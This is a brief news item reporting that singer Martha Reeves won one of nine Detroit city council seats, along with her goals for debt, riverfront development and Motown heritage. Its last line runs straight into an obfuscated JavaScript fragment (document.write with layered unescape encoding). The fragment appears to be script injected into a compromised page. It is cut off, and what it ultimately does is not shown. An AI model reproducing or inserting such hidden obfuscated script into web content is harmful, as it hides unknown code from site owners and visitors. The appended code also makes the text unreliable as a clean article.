The Detroit city council just got a bit more groove. Martha Reeves is in line to be a member of the city council.
With 99 percent of precincts reporting yesterday, Reeves came in eight place for one of nine seats. She got five-point-six percent of the vote. Reeves says she wants to be a voice for the people who think their opinions don't matter. Her goals are to eliminate the city's debt and bring new ideas to the city that she's seen elsewhere, like riverfront development and free parking to attract businesses. She also thinks Detroit's Motown music past should be better represented. Reeves plans to continue her singing career.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
